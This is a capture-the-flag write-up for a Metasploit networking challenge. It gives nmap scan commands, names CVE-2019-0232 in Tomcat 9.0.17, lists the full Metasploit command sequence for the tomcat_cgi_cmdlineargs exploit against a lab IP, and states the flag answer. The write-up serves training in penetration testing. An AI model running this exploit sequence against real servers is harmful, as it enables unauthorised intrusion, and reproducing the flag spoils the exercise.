Ready, set, elf.

Networking - Metasploit

Video

Resources

systeminfo

Challenge

What is the version number of the web server?

nmap -Pn -sC -sV -O -v 10.10.198.75

9.0.17

What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)

CVE-2019-0232

Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.

msfconsole
search 2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
show targets
set TARGET 0
show options
set RHOST 10.10.198.75
set targeturi /cgi-bin/elfwhacker.bat
exploit

No answer needed

What are the contents of flag1.txt

thm{whacking_all_the_elves}

Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!

No answer needed

PreviousThe Rogue Gnome NextCoal for Christmas

Last updated 5 years ago

hashtagVideo

hashtagResources

hashtagChallenge

hashtagWhat is the version number of the web server?

hashtag What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)

hashtagSet your Metasploit settings appropriately and gain a foothold onto the deployed machine.

hashtagWhat are the contents of flag1.txt

hashtagLooking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!

Video

Resources

Challenge

What is the version number of the web server?

What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)

Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.

What are the contents of flag1.txt

Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!